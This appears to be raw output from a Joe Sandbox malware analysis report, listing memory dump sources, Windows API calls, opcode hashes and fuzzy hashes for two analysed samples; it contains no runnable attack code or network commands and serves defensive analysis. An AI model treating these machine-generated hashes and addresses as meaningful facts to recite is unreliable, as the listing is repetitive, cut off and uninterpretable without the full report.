                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ABC35F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00ABA071,00000800,00000000,00000000), ref: 00ABA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00ABA071,00000800,00000000,00000000), ref: 00ABA282
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00AB9FF6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • SetWindowLongW.USER32(?,?,?), ref: 027C0A9D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LongWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:9.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:202
                                                                                                                                      Total number of Limit Nodes:7
22937->22938 22939 8bbfdf 22938->22939 22940 8bbd7c 4 API calls 22938->22940 22939->22880 22940->22939 22942 8bbd81 22941->22942 22943 8bc8d0 22942->22943 22945 8bbe64 22942->22945 22946 8bbe6f 22945->22946 22947 8b6e34 4 API calls 22946->22947 22948 8bc93f 22947->22948 22955 8bc9b3 22948->22955 22959 8bc9b8 22948->22959 22949 8bc94d 22951 8be6d8 LoadLibraryExW GetModuleHandleW CreateWindowExW 22949->22951 22952 8be6c0 LoadLibraryExW GetModuleHandleW CreateWindowExW 22949->22952 22950 8bc978 22950->22943 22951->22950 22952->22950 22956 8bc9b8 22955->22956 22957 8bcc99 22956->22957 22958 8bbf48 4 API calls 22956->22958 22958->22957 22960 8bc9e6 22959->22960 22961 8bcc99 22960->22961 22962 8bbf48 4 API calls 22960->22962 22962->22961

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 008BC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 008BC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: 26d850c017c3eed984c35d65c12c6c9db8331e05cfc6f54c030d94a782adb8c4
                                                                                                                                      • Instruction ID: ea6dd547108546c731436a37f28626925dd7d6f3c7a11d24066ec8d069c87cf0
                                                                                                                                      • Opcode Fuzzy Hash: 26d850c017c3eed984c35d65c12c6c9db8331e05cfc6f54c030d94a782adb8c4
                                                                                                                                      • Instruction Fuzzy Hash: 155142B49003498FDB10CFAAD948BEEBBF5FB88314F248559E019B7361DB745884CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC110
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 008BC14D
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 008BC18A
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 008BC1E3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: dfcd36068020745c1dfa990a7dd69c2d78b7ba187f88bfa8625e7f0e52b7e1bd
                                                                                                                                      • Instruction ID: 43405ebbf3469ec5a94c57a3d3adabab3f3140e787ec901c5be526cb757d91c1
                                                                                                                                      • Opcode Fuzzy Hash: dfcd36068020745c1dfa990a7dd69c2d78b7ba187f88bfa8625e7f0e52b7e1bd
                                                                                                                                      • Instruction Fuzzy Hash: B85140B49002498FDB10CFAAD948BEEBBF4FB88314F208559E019B3361DB746884CF65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph: rendered graph, block listing omitted (function blocks 8b9db0-8ba020; API node GetModuleHandleW at 8b9fd8-8ba003)
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 008B9FF6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID: $Oq$$Oq
                                                                                                                                      • API String ID: 4139908857-3704977154
                                                                                                                                      • Opcode ID: 33f3a8a7c12c66e9397a3d4ebe424b6855aab6b194aef9a14aaf3e511cbc5c61
                                                                                                                                      • Instruction ID: 590dfb80525bbdca9de14805312c58d51304f738a0a688259d815f715af5d948
                                                                                                                                      • Opcode Fuzzy Hash: 33f3a8a7c12c66e9397a3d4ebe424b6855aab6b194aef9a14aaf3e511cbc5c61
                                                                                                                                      • Instruction Fuzzy Hash: 15712470A00B058FDB24DF2AC4547AABBF5FF88310F108A29E58AD7B50DB74E945CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph: rendered graph, block listing omitted (function blocks 8b52fe-8b54b9; API node CreateActCtxA at 8b5370-8b5431)
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 008B5421
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: b676f924ce8bdd1655de6f3bf861a9ea2feebe94b3bca2c112ef607ca6b3fc9a
                                                                                                                                      • Instruction ID: 015ef0e833cf13ce1d54ff70e38bcb59580007c37b4b6eb2dba616c10897db21
                                                                                                                                      • Opcode Fuzzy Hash: b676f924ce8bdd1655de6f3bf861a9ea2feebe94b3bca2c112ef607ca6b3fc9a
                                                                                                                                      • Instruction Fuzzy Hash: 5A5112B1C00659CFDB20CFAAC9447DEBBB5FF59304F24806AD409AB251D7759989CFA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph: rendered graph, block listing omitted (function blocks 23e00fc-23e0969; API node CreateWindowExW at 23e08bb-23e091a)
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: ec717da7e354df5f0dbbff64a8b8b08b232d0daac975a7fd47ab795cc4d4f564
                                                                                                                                      • Instruction ID: fd96da44dd3a4e5d7dcd1c35504458d8d264ab4631c9e887584534d299d7fbc7
                                                                                                                                      • Opcode Fuzzy Hash: ec717da7e354df5f0dbbff64a8b8b08b232d0daac975a7fd47ab795cc4d4f564
                                                                                                                                      • Instruction Fuzzy Hash: 0A51F0B1D003199FDF14CFAAD894ADEBBB5FF58310F24822AE419AB250D7749845CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph: rendered graph, block listing omitted (function blocks 23e07ec-23e0969; API node CreateWindowExW at 23e08bb-23e091a)
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: 8391587d82386089af30446db87c1a215e081db7aa6beae06d951b3d1aa86b87
                                                                                                                                      • Instruction ID: 7a0294c55e7c94258048d4765d5ac695fa95c8d3aac1b31272efdc5ea4c28844
                                                                                                                                      • Opcode Fuzzy Hash: 8391587d82386089af30446db87c1a215e081db7aa6beae06d951b3d1aa86b87
                                                                                                                                      • Instruction Fuzzy Hash: 9651BEB1D00219DFDF14CFAAD884ADEBBB5FF58314F24822AE819AB250D7749945CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph: rendered graph, block listing omitted (function blocks 23e010c-23e0969; API node CreateWindowExW at 23e087b-23e091a)
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 023E090A
                                                                                                                                      Memory Dump Source
• Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 34d1524e2be946ae1a3d9729740aaefc4a4c567d7f6a1d63a2b4054b4a101523
• Instruction ID: aafd320132561f32d297f736603c21c2f76cd33b02da12fdb718c6b7b77df8c2
• Opcode Fuzzy Hash: 34d1524e2be946ae1a3d9729740aaefc4a4c567d7f6a1d63a2b4054b4a101523
• Instruction Fuzzy Hash: 0151BFB1D002199FDF14CF9AD884ADEBBB5BF58314F24822AE819BB250D7B49945CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 023E2E71
Memory Dump Source
• Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 9ce2840724179b56e963ff836fd1a20db2cf1d1b628fec4df1a464b8450e16be
• Instruction ID: 919bbcdeaec7d924aa9fd0b5fd9b20bb1654efd903e85fa739a55b036bdb77d6
• Opcode Fuzzy Hash: 9ce2840724179b56e963ff836fd1a20db2cf1d1b628fec4df1a464b8450e16be
• Instruction Fuzzy Hash: 86411BB9A003258FCB14DF59C448BABBBF9FB88314F248559E519A7361D374A845CFA0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 008B5421
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 5054ede1a2bf6436e56082cbecb2bf151e3e04c43aaa6dd5e55a4508c06a3daf
• Instruction ID: ab9e5ab55295217dea5d4ee23073eac4a4f339b9c557b9266b9e0b8bf359db8a
• Opcode Fuzzy Hash: 5054ede1a2bf6436e56082cbecb2bf151e3e04c43aaa6dd5e55a4508c06a3daf
• Instruction Fuzzy Hash: 8741CEB1C006598BDB24CFA9C944BCEBBB5BB49304F248069D409AB251D7B56985CFA0
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008BC35F
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: a36c5923f42fdd328d3040e9f499ef8ccb5bd40424e300e26711b835141f38a6
• Instruction ID: 8dccff3eaa8d71a7c57c614fddc0faf1dcb67aa84b2898a61365b37007e7012a
• Opcode Fuzzy Hash: a36c5923f42fdd328d3040e9f499ef8ccb5bd40424e300e26711b835141f38a6
• Instruction Fuzzy Hash: 0821B5B5D002199FDB10CFAAD984ADEBBF8FB58314F14855AE914A7310D378A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 008BC35F
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 9952b72300dd69684b2b78e4c32aed1d92d56e665d2fb364d42e9960bc37c57e
• Instruction ID: ebcb2b380f9fe4aabda837ccc062bfedce5ea6b0ed3d98b893b7c9c7a4952d65
• Opcode Fuzzy Hash: 9952b72300dd69684b2b78e4c32aed1d92d56e665d2fb364d42e9960bc37c57e
• Instruction Fuzzy Hash: 9421C4B5D002199FDB10CFAAD984ADEBFF8FB58324F14851AE914A3310D378A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BA071,00000800,00000000,00000000), ref: 008BA282
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 243444b8cfb1dd673b337eb2eed532788e5d766373b56d73fbf375ac5604773c
• Instruction ID: 6d367444d082353c0e706bc15aba83bd40282b25ac63a68d66bb142e8933bc97
• Opcode Fuzzy Hash: 243444b8cfb1dd673b337eb2eed532788e5d766373b56d73fbf375ac5604773c
• Instruction Fuzzy Hash: 332103B6D002099FDB14CF9AC844ADEFBF8FB98310F14852AD419A7600C379A945CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,008BA071,00000800,00000000,00000000), ref: 008BA282
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 7521c6770fae75d42fe043f96cec38ea1493175f270f1d41d6957590353bdce9
• Instruction ID: 066577438b612f3e83f1ff34ca035a512866b7b622969f3f82f2990b05d5274e
• Opcode Fuzzy Hash: 7521c6770fae75d42fe043f96cec38ea1493175f270f1d41d6957590353bdce9
• Instruction Fuzzy Hash: 411100B6D002099FCB14CF9AD444ADEBBF8EB98324F14852AE419A7300C379A945CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,?,?), ref: 023E0A9D
Memory Dump Source
• Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: 1f875a74afa6a304bd6cfa6ee85f3ac6c2b78fe0a9e489ec4d9e7170df04b58c
• Instruction ID: 873afc86e5062fb22eaa3de1758d3e93bc9175ee8b6c557ee04bd07f775db974
• Opcode Fuzzy Hash: 1f875a74afa6a304bd6cfa6ee85f3ac6c2b78fe0a9e489ec4d9e7170df04b58c
• Instruction Fuzzy Hash: 6411F5B5900219DFDB10DF9AD584BDEBBF8EB48324F10855AD855B7340C374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 008B9FF6
Memory Dump Source
• Source File: 00000007.00000002.317081706.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8b0000_iJyzakGsXF.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 632c45aa7e5d30a14ef37121efeebf7d3cfa4d897aec11ed5377d088ba54f05f
• Instruction ID: 7f67f2966a43d03d2644ee3922621c3dcef6f7470a4a5ebaa547190021423c2f
• Opcode Fuzzy Hash: 632c45aa7e5d30a14ef37121efeebf7d3cfa4d897aec11ed5377d088ba54f05f
• Instruction Fuzzy Hash: 7C1102B5C006498FCB20CF9AC444ADEFBF8EB88324F10851AD459B7300C374A545CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowLongW.USER32(?,?,?), ref: 023E0A9D
Memory Dump Source
• Source File: 00000007.00000002.319789224.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_23e0000_iJyzakGsXF.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: d48b626ac2f68c5657d169c605427126d2bca89fb3d7d963bbaaaa95383140e5
• Instruction ID: 727d1a5bce2dbd4c58748df51b2cb2ec756519374670ccf2b141cb37e1f45679
• Opcode Fuzzy Hash: d48b626ac2f68c5657d169c605427126d2bca89fb3d7d963bbaaaa95383140e5
• Instruction Fuzzy Hash: E811D3B59002199FDB10DF9AD584BDEBBF8EB48324F20855AD959B7340C374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abcdf8b314b107cec1557f547cd769601709be2aac493b5413ff0776fb5f6dda
• Instruction ID: 83ac22771eb94a61db2cee82cb5376f5bf8c68667d82cb65e9d236064ff6ca5d
• Opcode Fuzzy Hash: abcdf8b314b107cec1557f547cd769601709be2aac493b5413ff0776fb5f6dda
• Instruction Fuzzy Hash: 5D21C471504340DFDB25DF54D9C0B26BFA5FB98318F248669EC051B286C33ADC65DAA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16caf6d2369fbab970833c165ff1de5db1d9d06e0a9fc8f5e661514750ace37a
                                                                                                                                      • Instruction ID: 20896bb8aa461508fc4dcd5713d3e9df0146533f977708c55c9759009e48c0c3
                                                                                                                                      • Opcode Fuzzy Hash: 16caf6d2369fbab970833c165ff1de5db1d9d06e0a9fc8f5e661514750ace37a
                                                                                                                                      • Instruction Fuzzy Hash: C2210471504240EFDB21DF18D9C0B66BBA5FB88324F24C66DE8094B282C33EDC86CE61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 761919dee7339141ac6d05f3c04d8730c84f9bd06d63f2c5a0fd6f2d83b879d6
                                                                                                                                      • Instruction ID: f1bba9d8725958c1ebe0b7185f684fc58960e72ec3a9741e2ace5dbff6650c30
                                                                                                                                      • Opcode Fuzzy Hash: 761919dee7339141ac6d05f3c04d8730c84f9bd06d63f2c5a0fd6f2d83b879d6
                                                                                                                                      • Instruction Fuzzy Hash: 5221F275604240DFDB24DF18D9C4B56BF65FB88314F24C569D80A4B286C37EDC86CEA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316513721.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_70d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                                                                      • Instruction ID: cf3ebcaecb5ec30374dbe712e318e405a4ed12d3a26e7d8079ebfdcb8c68b3f4
                                                                                                                                      • Opcode Fuzzy Hash: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                                                                      • Instruction Fuzzy Hash: D011B176504280CFCB12CF54D9C4B16BFB2FB98324F24C6A9DC450B656C33AD96ACBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.316629057.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_71d000_iJyzakGsXF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                                                                      • Instruction ID: de743a5671a96832e296f0116f1810456169550465b6ceeddb170237e11f4d2d
